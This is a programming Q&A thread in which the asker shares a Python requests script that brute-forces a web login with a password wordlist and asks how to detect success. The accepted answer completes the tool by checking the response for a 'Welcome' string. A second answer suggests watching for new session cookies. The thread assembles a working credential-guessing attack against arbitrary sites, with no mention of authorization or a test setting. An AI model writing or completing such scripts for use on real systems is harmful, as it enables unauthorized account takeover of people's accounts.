# How to know when you “log in” to a website using Python's Requests module?

Tags: python, python-requests

Im doing a brute force password script with requests module. How can i check when i have succes login in to the website?

```
url = sys.argv[1]
user = sys.argv[2]
file = sys.argv[3]
varuser = sys.argv[4]
varpass = sys.argv[5]
passwords = open(file, "r").read().splitlines()

for p in passwords:
    payload = {varuser: user, varpass: p}
    requests.post(url, data=payload)
```

Answer (score 1, accepted):

This is depends of the website. In general, you can search for some string in the text of response:

```
...
    r = requests.post(url, data=payload)
    if 'Welcome' in r.text:
        print('SUCCESS!')
        break
...
```

Answer (score 0):

You can check the cookies returned.  Probably there will be a (new?) session ID when you log in.  But it depends on how the website works anyways.